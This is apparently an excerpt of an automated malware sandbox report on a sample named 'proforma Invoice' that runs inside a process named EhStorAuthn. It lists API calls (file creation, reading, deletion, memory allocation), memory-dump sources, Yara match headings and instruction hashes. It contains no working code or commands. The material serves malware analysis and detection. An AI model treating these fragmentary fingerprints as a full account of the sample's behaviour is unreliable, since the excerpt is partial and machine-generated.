                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011D02BD
                                                                          • RTL: Re-Waiting, xrefs: 011D031E
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011D02E7
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 0f51f162dbbf05610625d66cb1bade9c270d54f3bae58ed74318aef427f81582
                                                                          • Instruction ID: 7a19f37b5df8fb124def382f5bec8845f515cad68c7a301b3401c55c35027ca8
                                                                          • Opcode Fuzzy Hash: 0f51f162dbbf05610625d66cb1bade9c270d54f3bae58ed74318aef427f81582
                                                                          • Instruction Fuzzy Hash: 04E19F306087429FE72DDF28C884B2ABBE0BB89718F144A1DF5A5CB2D1D774D946CB52
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D728C
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 011D72C1
                                                                          • RTL: Resource at %p, xrefs: 011D72A3
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011D7294
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: a21ddb78a65ab752dcc427fe7abaad9f826befbf107d5b13db0360a706cccd88
                                                                          • Instruction ID: 3476cf1041d5bd995396e09e385e9c10313330672d8131c54ba6b65a69a4e0d0
                                                                          • Opcode Fuzzy Hash: a21ddb78a65ab752dcc427fe7abaad9f826befbf107d5b13db0360a706cccd88
                                                                          • Instruction Fuzzy Hash: 7841F231704643ABDB29DE69CC41F6AB7A5FF94B18F140619F956AB280DB30F80287D5
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: 42ff8a4d62d179fd0f67aa2a44dc6ede8ca5febecdd16700343aa71696f00196
                                                                          • Instruction ID: 0b02f9cb2b3a3fc8838d397621a723221213bbf6111a1a5470ffea35aa3aa7bf
                                                                          • Opcode Fuzzy Hash: 42ff8a4d62d179fd0f67aa2a44dc6ede8ca5febecdd16700343aa71696f00196
                                                                          • Instruction Fuzzy Hash: 43318672A10219DFDB24DF2DCC40BEEB7F8EB54650F540555F949E3244EB30EA448BA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 1d1a6b2c2c8aa8bd036b481d69cbfc1142576095ebe953f9e1d53f00c8ffa5ab
                                                                          • Instruction ID: 1bae195874f4357979bf2831046baa506a1806a0275ecf2e2abcfb4245f2bd9c
                                                                          • Opcode Fuzzy Hash: 1d1a6b2c2c8aa8bd036b481d69cbfc1142576095ebe953f9e1d53f00c8ffa5ab
                                                                          • Instruction Fuzzy Hash: 6B811C72D00269DBDB39DB54CC44BEEB7B8AF58754F1041DAAA19B7240E7705E84CF60

                                                                          Execution Graph

                                                                          Execution Coverage:2.7%
                                                                          Dynamic/Decrypted Code Coverage:4.2%
                                                                          Signature Coverage:1.5%
                                                                          Total number of Nodes:455
                                                                          Total number of Limit Nodes:76

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 006FC354
                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 006FC38F
                                                                          • FindClose.KERNELBASE(?), ref: 006FC39A
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 5a6c57099f65defe791c817b2f8ab5fb581e2cb6e1dc7637ff37b040ec40bc93
                                                                          • Instruction ID: 4b1715a1d167fb0bacf8ce68eca3f222af0a39b53320fa1b82bd57eb93fb91d7
                                                                          • Opcode Fuzzy Hash: 5a6c57099f65defe791c817b2f8ab5fb581e2cb6e1dc7637ff37b040ec40bc93
                                                                          • Instruction Fuzzy Hash: A531837250074CBBDB24DF60CC86FFF77BD9B44754F148558B608A7181DA70AB858BA0
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00708E5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 7d9734b170010c4ac084667fe29e509b76cf4a40501081e9cefeed82f1ee1cbf
                                                                          • Instruction ID: dabda99d2844b94dd386d430ca8731767b2e8442fab8515c750f769f60911ba7
                                                                          • Opcode Fuzzy Hash: 7d9734b170010c4ac084667fe29e509b76cf4a40501081e9cefeed82f1ee1cbf
                                                                          • Instruction Fuzzy Hash: E031D6B5A01208AFDB14DF99D881EDE77F9EF8C714F108219F919A7380D730A951CBA5
                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00708FB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 8628baa00eeb20c27a3a3c652945a02e5a33cdc8bc9a1baa74aa27edfafa21f0
                                                                          • Instruction ID: 7d0cb9bb9a1687ef585b688c478795da068c236112f53e8f5a62c805962f7bb4
                                                                          • Opcode Fuzzy Hash: 8628baa00eeb20c27a3a3c652945a02e5a33cdc8bc9a1baa74aa27edfafa21f0
                                                                          • Instruction Fuzzy Hash: E931C8B5A04208AFDB14DF98D881EEF77F9EF88714F108219F919A7280D770A911CBA5
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(006F1A7E,?,00707C7F,00000000,00000004,00003000,?,?,?,?,?,00707C7F,006F1A7E,00707C7F,6AB05589,006F1A7E), ref: 00709298
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: 0a1abe83959c0b6f281077450865f9d0de8fb66725858892d53971d65e90dd69
                                                                          • Instruction ID: 987836c8fa57e7f60d1308cd18292d546ed5f8a934323e8859a2e91971d98938
                                                                          • Opcode Fuzzy Hash: 0a1abe83959c0b6f281077450865f9d0de8fb66725858892d53971d65e90dd69
                                                                          • Instruction Fuzzy Hash: A52117B5A04208EBDB14DF98DC41EEFB7B9EF88710F008219F918A7280D774A911CBA5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: f93854eec5ac7047126131a50d15725e9e0fc64a6b3f3b32b99ea7f63d8223c9
                                                                          • Instruction ID: 6f45020d6d975278812da5842600f7bddbe7745dba51fdf191d657c628f4189e
                                                                          • Opcode Fuzzy Hash: f93854eec5ac7047126131a50d15725e9e0fc64a6b3f3b32b99ea7f63d8223c9
                                                                          • Instruction Fuzzy Hash: 57117371A00244FBD620EB64CC46FEF77ACEF85710F408659FA089B281D7757905C7A5
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00709094
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7c41624b768b3cbddda74f9010c4dfc06b7fb84b228c54a5b541b334fe7bd4fc
                                                                          • Instruction ID: f6350de4904976544145a519f610ce4c45c78701f7146322e6c7bf54b76d5439
                                                                          • Opcode Fuzzy Hash: 7c41624b768b3cbddda74f9010c4dfc06b7fb84b228c54a5b541b334fe7bd4fc
                                                                          • Instruction Fuzzy Hash: EC90023561581012B1507158488454640259BE0305B56C021E0525574C8A14DA565362
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                                                          • Instruction ID: 04ad1aca25ecfbc333dc90cc8bf8d080045fced0e6f1c983c576dbeb9ed0ce0f
                                                                          • Opcode Fuzzy Hash: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                                                          • Instruction Fuzzy Hash: 6890023521149802F1207158840474A00258BD0305F5AC421A4525678D8695D9917122
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                                                          • Instruction ID: 739ca9f4f9ebb5346da7671796f3f29602c611bf04f269e54c77bb904c6fc183
                                                                          • Opcode Fuzzy Hash: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                                                          • Instruction Fuzzy Hash: CB90023521141842F11071584404B4600258BE0305F56C026A0225674D8615D9517522
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                                                          • Instruction ID: b0c8b1b9d89b6681c10f110819601343b1106fede93b04ed7c28cdda64a4bcce
                                                                          • Opcode Fuzzy Hash: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                                                          • Instruction Fuzzy Hash: BE90023521141402F1107598540864600258BE0305F56D021A5125575EC665D9916132
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a679e6586f13f5ae22cd64d6da624617b3fe4b09521e95a737815e8060f59fec
                                                                          • Instruction ID: 724ed6084ec801b994ba3b0e5fb45032a04a1cd173f93bea6628f300f96bfa37
                                                                          • Opcode Fuzzy Hash: a679e6586f13f5ae22cd64d6da624617b3fe4b09521e95a737815e8060f59fec
                                                                          • Instruction Fuzzy Hash: 7190022531141003F150715854186064025DBE1305F56D021E0515574CD915D9565223
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                                                          • Instruction ID: 42ef9a698eb7bff1014cc742f08ffdb6eb445a98398d5e9ff0301a2c5b5f7cec
                                                                          • Opcode Fuzzy Hash: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                                                          • Instruction Fuzzy Hash: C390022D22341002F1907158540860A00258BD1206F96D425A0116578CC915D9695322
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                                                          • Instruction ID: e201b741e320f292ac2f6b2efbab26c6fb2227883a1e8350442b7a4ed63a2ea9
                                                                          • Opcode Fuzzy Hash: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                                                          • Instruction Fuzzy Hash: 2F90023521141413F1217158450470700298BD0245F96C422A0525578D9656DA52A122
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                                                          • Instruction ID: 3477de52ddc57e6b6dab2908beb0797d1ed5075dc1ab0a5bb1554246d4e75f75
                                                                          • Opcode Fuzzy Hash: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                                                          • Instruction Fuzzy Hash: 84900225252451527555B158440450740269BE0245796C022A1515970C8526E956D622
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8066be35576fc8713152627bdcdc995f8eb0323baab9fb3302150cf5a04a6b11
                                                                          • Instruction ID: 4e2986db72a1c5feb33bc8d10feb0257542ffdc7d02e5ee6a7351ba9747be3a0
                                                                          • Opcode Fuzzy Hash: 8066be35576fc8713152627bdcdc995f8eb0323baab9fb3302150cf5a04a6b11
                                                                          • Instruction Fuzzy Hash: 5690026521181403F1507558480460700258BD0306F56C021A2165575E8A29DD516136
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 86d572a160c210016f1691e3b8d62baa2c5046075e044c6a79fe1efcea9de325
                                                                          • Instruction ID: c2f008de3997f75ae760503072f4945780312a4661f151c26151dccb1805079a
                                                                          • Opcode Fuzzy Hash: 86d572a160c210016f1691e3b8d62baa2c5046075e044c6a79fe1efcea9de325
                                                                          • Instruction Fuzzy Hash: 7890022561141502F11171584404616002A8BD0245F96C032A1125575ECA25DA92A132
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                                                          • Instruction ID: e292c81da1eb5ee52cba6a34bb993ac62bd4cc7662301e7d73ec92faa2507545
                                                                          • Opcode Fuzzy Hash: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                                                          • Instruction Fuzzy Hash: 1790026535141442F11071584414B060025CBE1305F56C025E1165574D8619DD526127
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                                                          • Instruction ID: adb9fc78d02a4198befd458c8ef96766612af3f7ff995f3c3e7e5ce3cd9ab59f
                                                                          • Opcode Fuzzy Hash: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                                                          • Instruction Fuzzy Hash: 6F900225221C1042F21075684C14B0700258BD0307F56C125A0255574CC915D9615522
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
